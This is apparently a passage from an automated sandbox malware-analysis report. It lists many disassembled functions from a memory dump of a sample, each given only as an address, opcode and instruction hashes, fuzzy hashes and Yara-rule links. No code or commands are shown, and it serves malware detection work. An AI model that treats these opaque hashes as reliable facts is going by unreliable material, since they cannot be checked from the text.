                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                                      • Instruction ID: a666f254bc9d0211b4950e27689bbbb07294ab2735151287c57d33e1c358b180
                                                                                                                                      • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                                      • Instruction Fuzzy Hash: 5401D63260068C9BD322971DC905F6ABBDDEF81750F0881E6FB44CBAA2DB78D900D651
                                                                                                                                      Function 010961E5 Relevance: .0, Instructions: 41COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 7814578e0eee5a9e6405a459552c59fbd09fbb2568acfd50cdd45db8ddaf5014
                                                                                                                                      • Instruction ID: a93bd50e4827256631ca5c381ae16164fd6486568b5b63dab02ffac91441d46b
                                                                                                                                      • Opcode Fuzzy Hash: 7814578e0eee5a9e6405a459552c59fbd09fbb2568acfd50cdd45db8ddaf5014
                                                                                                                                      • Instruction Fuzzy Hash: 60017C71A012499FDB00DFA9D851EEEBBF8AF48710F14405AF540AB380D738AA01CB94
                                                                                                                                      Function 010463C0 Relevance: .0, Instructions: 41COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                      • Instruction ID: 3a498c4c0abe29ba84fec7db6f702686402862052552586964113c33a5267be2
                                                                                                                                      • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                      • Instruction Fuzzy Hash: 1EF01D7220001DBFEF019F94DD81DEF7BBEEB593D8B104125FA11A2161D636DE21ABA0
                                                                                                                                      Function 0104A4B0 Relevance: .0, Instructions: 40COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: e98ada05b5aff123211ce95d111754b276c5bbd0f1bfc35dbbfc921ddc57bc24
                                                                                                                                      • Instruction ID: 86a34aafc4dc84a3b34b7512dfdf608e67deceb17511530ba6ea7fef488e37a1
                                                                                                                                      • Opcode Fuzzy Hash: e98ada05b5aff123211ce95d111754b276c5bbd0f1bfc35dbbfc921ddc57bc24
                                                                                                                                      • Instruction Fuzzy Hash: E5018536200209EBCF129E84DD80EDE3FAAFB4C664F068151FE5966220C736D970EF81
                                                                                                                                      Function 00FBC0F0 Relevance: .0, Instructions: 39COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 674397409c8b343223982415f021608133b84a03c78f833b609ae60867eaa54b
                                                                                                                                      • Instruction ID: d4d9cd3e985c8b4eaf96356d48095ef8c9e4997c9b58973545372ede16d05549
                                                                                                                                      • Opcode Fuzzy Hash: 674397409c8b343223982415f021608133b84a03c78f833b609ae60867eaa54b
                                                                                                                                      • Instruction Fuzzy Hash: 87F02B727143015BF754A61E9C01FA33295D7D0760F298039E7059F2C3E971DC01A7D4
                                                                                                                                      Function 00FF656A Relevance: .0, Instructions: 39COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 161304bba1914de89e0b67f7ba08c8bc0eeb7193623d28a2da467b1cd06d20be
                                                                                                                                      • Instruction ID: 36e553ebc22e63e48bf6e3d4313bc90a5f44b44091b9261a24ece8ed2ebbcba7
                                                                                                                                      • Opcode Fuzzy Hash: 161304bba1914de89e0b67f7ba08c8bc0eeb7193623d28a2da467b1cd06d20be
                                                                                                                                      • Instruction Fuzzy Hash: 5601A474600A899BE333AB3CCD48F7537E9AF40B00F4C4690BA81EF6E6DB28D8019614
                                                                                                                                      Function 0106437C Relevance: .0, Instructions: 37COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                      • Instruction ID: 2fa6ce53629b957a5285a27f8caed3e977e4bfb2e27bea4b3df0315c495fd18b
                                                                                                                                      • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                      • Instruction Fuzzy Hash: AFF02E31741D7347EBB5AA2E8860B2FBADEAF80E00B05856DA6C1DB640DF10DC00C780
                                                                                                                                      Function 0104E872 Relevance: .0, Instructions: 36COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                                      • Instruction ID: fa1959ebaaf9a233372a197c17a31cf7f01e9829c1b096e14933fc0fc4ce30da
                                                                                                                                      • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                                      • Instruction Fuzzy Hash: FDF054727115119BFB219B4DDCC0F16B7E9BFC5A60F590079B6489B261C768EC0187D0
                                                                                                                                      Function 0104C89D Relevance: .0, Instructions: 36COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 11421a77365e95a70d4d03e6fcd899df010dc5a1b94659badf8aebde72ad4c22
                                                                                                                                      • Instruction ID: 29b52a426106f83c9906a378ac536029aa62a7a64953a09f8eafedcf7ebe26d1
                                                                                                                                      • Opcode Fuzzy Hash: 11421a77365e95a70d4d03e6fcd899df010dc5a1b94659badf8aebde72ad4c22
                                                                                                                                      • Instruction Fuzzy Hash: 13F0A4706053089FD310EF28C541E1AB7E4EF58710F40465EB9D4DB390E634EA00C756
                                                                                                                                      Function 00FF0854 Relevance: .0, Instructions: 35COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                                      • Instruction ID: 9a07468c4df2fc8010e5c450de5e1597adb2a74638d867fee1885f94bb5f4d93
                                                                                                                                      • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                                      • Instruction Fuzzy Hash: 32F0B472610204AFE714DB21CC01F96B7E9EF98750F1480B89645D72B1FAB4DE01E654
                                                                                                                                      Function 0104C912 Relevance: .0, Instructions: 34COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 66755f0e663bce6ca2458777d2531dcfa525a8f497eb15f3ff6d3af7ea75e2a0
                                                                                                                                      • Instruction ID: 4102cea1f9cb02540c445de5b91f00ed459fb0bf6918a6ff2ca3208a1c7567ec
                                                                                                                                      • Opcode Fuzzy Hash: 66755f0e663bce6ca2458777d2531dcfa525a8f497eb15f3ff6d3af7ea75e2a0
                                                                                                                                      • Instruction Fuzzy Hash: 2CF04FB5A0224DAFDB05EF69C555E9EB7B4EF18300F008066B995EB385DA38EE01CB54
                                                                                                                                      Function 00FC47FB Relevance: .0, Instructions: 33COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: a9fb9fe125260f26bf58a18b17ce7a73873621265008c51ba7b2e615011d9c11
                                                                                                                                      • Instruction ID: d0a64901ad08f01ed5a32daf0063bbbd6eae68b88ed24eb5130d217fb18167da
                                                                                                                                      • Opcode Fuzzy Hash: a9fb9fe125260f26bf58a18b17ce7a73873621265008c51ba7b2e615011d9c11
                                                                                                                                      • Instruction Fuzzy Hash: 9EF0F031C122D29EE7218B18C636F6177C49B40730F0C896ED49983182C324FC80E610
                                                                                                                                      Function 01080115 Relevance: .0, Instructions: 32COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 09e1dddc3e99b605d1dc3a8fa08123b2b6a74da09679cf18bbfec938583663c2
                                                                                                                                      • Instruction ID: 407d2e2f2668660ea374fc1b532aeae6876a0cc59728b6509b813bba0901fa51
                                                                                                                                      • Opcode Fuzzy Hash: 09e1dddc3e99b605d1dc3a8fa08123b2b6a74da09679cf18bbfec938583663c2
                                                                                                                                      • Instruction Fuzzy Hash: D7F0203681EA850ADF727B2CA8E02D13BA9A751120F1910C9E8E16720EC57B8887C328
                                                                                                                                      Function 00FFC5ED Relevance: .0, Instructions: 31COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1fb110b0552f541adab6c6c15a69d05c45c5036aa23a246d3b13c81f1773632d
                                                                                                                                      • Instruction ID: b1ef5e3f69bc8ece22e9e9205a9dfec56fdfa1b7cbece882f192effb134e0ff6
                                                                                                                                      • Opcode Fuzzy Hash: 1fb110b0552f541adab6c6c15a69d05c45c5036aa23a246d3b13c81f1773632d
                                                                                                                                      • Instruction Fuzzy Hash: 35F0BE7291966D9BD7229618C348B7173D8AF04BB0F189526D64AC7622C264CC81EAD0
                                                                                                                                      Function 01002619 Relevance: .0, Instructions: 31COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                                      • Instruction ID: 5f4f2639695c17392014c762f04e62b45a027e4126e9fc8eb8c31c49f93df9b3
                                                                                                                                      • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                                      • Instruction Fuzzy Hash: 79E0D832300A002BF712AF59CCC8F4777AEDFD6B14F040079B5045F292C9E6DD0982A4
                                                                                                                                      Function 01056030 Relevance: .0, Instructions: 29COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                                      • Instruction ID: 0ec02a064f13978a08399dbee3b1c67c49acd43f956d0fcc0c05502505057f76
                                                                                                                                      • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                                      • Instruction Fuzzy Hash: 9EF0A0721002049FE3609F09D840F53B7F8EB05364F85C066FA088B261D33AEC40CBA0
                                                                                                                                      Function 00FC0710 Relevance: .0, Instructions: 28COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                                      • Instruction ID: e624a5fe81b7d778449c740c5ad509fef3d28c88c18a60c12d3efb09c01b77a4
                                                                                                                                      • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                                      • Instruction Fuzzy Hash: 57F0A03A204345DBEB1ADF19D541BE97BE5EB81350B140099EC828B341DB35E982EB54
                                                                                                                                      Function 00FF49D0 Relevance: .0, Instructions: 28COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                                      • Instruction ID: 623029f5e5b0904cd44822a623a2c8f267e4cb5ee818480f1f046477843b7ad9
                                                                                                                                      • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                                      • Instruction Fuzzy Hash: B3E0923368454AABC3212E598801B7777A69FD07A0F150429E3008B360DB7CEC40F798
                                                                                                                                      Function 01094164 Relevance: .0, Instructions: 27COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3bca5c0b9458d2b0082ad2074de1a7538da00625eb0bf3c3c3d808b2d4ab0ca8
                                                                                                                                      • Instruction ID: bb05ebdb3d93f2704461894fc6457e4663b95170b8403fd1d3552acb058d62b6
                                                                                                                                      • Opcode Fuzzy Hash: 3bca5c0b9458d2b0082ad2074de1a7538da00625eb0bf3c3c3d808b2d4ab0ca8
                                                                                                                                      • Instruction Fuzzy Hash: 65F0E571A265914FEFB2D72CF770B5277E0AB10770F0A05E4D480C7912C324DC42D650
                                                                                                                                      Function 0106678E Relevance: .0, Instructions: 27COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                                      • Instruction ID: fe21f229979e88f6b4cc300fa1d750989d2dad58e6d81bd5991b2d0fa58808d5
                                                                                                                                      • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                                      • Instruction Fuzzy Hash: 7BE0DF32A00114BFDB21A7998D02F9BBEBCEB80FA0F050055B600E71A0E535EE00E690
                                                                                                                                      Function 010908C0 Relevance: .0, Instructions: 25COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                                                      • Instruction ID: 426beae9a1bc260406ec564f687ac3d19e8837e73cd72ec7c9b3ca7cb7246da8
                                                                                                                                      • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                                                      • Instruction Fuzzy Hash: B7E09B727403518BCF258A1DC150A97B7ECDFD5A60F1580A9EAD54B616C271F843D6D0
                                                                                                                                      Function 00FC25E0 Relevance: .0, Instructions: 23COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 15addedd078dbd08159edb58f6aab259ccd93276206a71d9ede381df36c21de7
                                                                                                                                      • Instruction ID: 7b150f58bd5f7b3560f843a359ce242b0d277591ac8000678a837df36d2a402d
                                                                                                                                      • Opcode Fuzzy Hash: 15addedd078dbd08159edb58f6aab259ccd93276206a71d9ede381df36c21de7
                                                                                                                                      • Instruction Fuzzy Hash: D2E09232100A549BC322BB29DD16F8B779AEB54364F014519F15557291CB39A910D794
                                                                                                                                      Function 0107A456 Relevance: .0, Instructions: 23COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                                      • Instruction ID: 31d613bf8e5bb1b2e1f316de3f39af6c40a9ec3bec4b77311aefe0acd0cd79d3
                                                                                                                                      • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                                      • Instruction Fuzzy Hash: 39E09231010A51DFE7326F2ADD0CB567AE1BF80711F1C8C6DB1D6124B1CB7998C0DA44
                                                                                                                                      Function 01044000 Relevance: .0, Instructions: 22COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                      • Instruction ID: b1cace9d48dc69849dcdf5996d782fb72e325727aa636753a03801d0a63d3e00
                                                                                                                                      • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                      • Instruction Fuzzy Hash: C0E0AE743002058BE755CF19C084B627BA6BFD5A10F28C0B8A9888F205EB32A8528A40
                                                                                                                                      Function 00FB823B Relevance: .0, Instructions: 21COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                                      • Instruction ID: b836d257699eff558c66c4dbad73bdb2f86dd54eb96320e61999db5a4c908424
                                                                                                                                      • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                                      • Instruction Fuzzy Hash: 90E08632400910DEE7322F16DC04B9176A5FB94B50F244819E181160A48B745C82EE44
                                                                                                                                      Function 00FC2050 Relevance: .0, Instructions: 20COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 4642d66a85c1da2dc20886b651cb2ec9e8ab252a7166887a5e9c25c2baa53580
                                                                                                                                      • Instruction ID: 98723a6e2ab6c2b6323dce29df8102b5050138c38ca15c679aa60ae2ae3e23e5
                                                                                                                                      • Opcode Fuzzy Hash: 4642d66a85c1da2dc20886b651cb2ec9e8ab252a7166887a5e9c25c2baa53580
                                                                                                                                      • Instruction Fuzzy Hash: A9E08C321005606BC211FB5DEE52F8A739AEB94360F040125F15197691CA29AD00D794
                                                                                                                                      Function 00FF8A90 Relevance: .0, Instructions: 20COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                                                      • Instruction ID: 6c611a1f7529528702b13fee943c9ffc391d714fd4a9d1db63baf8d5c43494e0
                                                                                                                                      • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                                                      • Instruction Fuzzy Hash: B5E08633511A1897C728DE18D511B7277A4EF45770F19463EA61347790C934E944D794
                                                                                                                                      Function 00FFE59C Relevance: .0, Instructions: 16COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                      • Instruction ID: 1185bf77c303217f7001014fbaba6311140d590f6490d3c0ca6758947c41ce58
                                                                                                                                      • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                      • Instruction Fuzzy Hash: 15D0A932214A20ABD772AA1CFC00FC333E9AB88720F0A049AB008C7151C3A4AC81CA84
                                                                                                                                      Function 0103E908 Relevance: .0, Instructions: 16COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
